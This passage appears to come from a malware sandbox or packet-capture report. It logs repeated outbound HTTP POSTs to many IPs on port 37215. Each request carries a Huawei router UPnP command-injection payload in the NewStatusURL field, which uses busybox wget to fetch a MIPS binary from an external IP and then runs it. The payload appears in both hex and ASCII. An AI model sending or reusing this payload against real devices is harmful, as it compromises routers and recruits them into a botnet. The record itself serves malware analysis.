20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            984192.168.2.1334494156.106.1.13437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.422615051 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            985192.168.2.1355272197.12.144.3737215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.424223900 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            986192.168.2.1349596156.166.33.14837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.425276995 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            987192.168.2.1332900197.87.15.237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.427010059 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            988192.168.2.135294441.231.70.24237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.428781986 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            989192.168.2.1340274156.181.225.23337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.430715084 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            990192.168.2.1352322156.185.231.23937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.433231115 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            991192.168.2.135775841.167.32.24437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.435022116 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            992192.168.2.1336434197.251.106.16537215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.437016964 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            993192.168.2.1347486197.193.135.13137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.438817978 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            994192.168.2.134175641.221.14.2237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.440191031 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
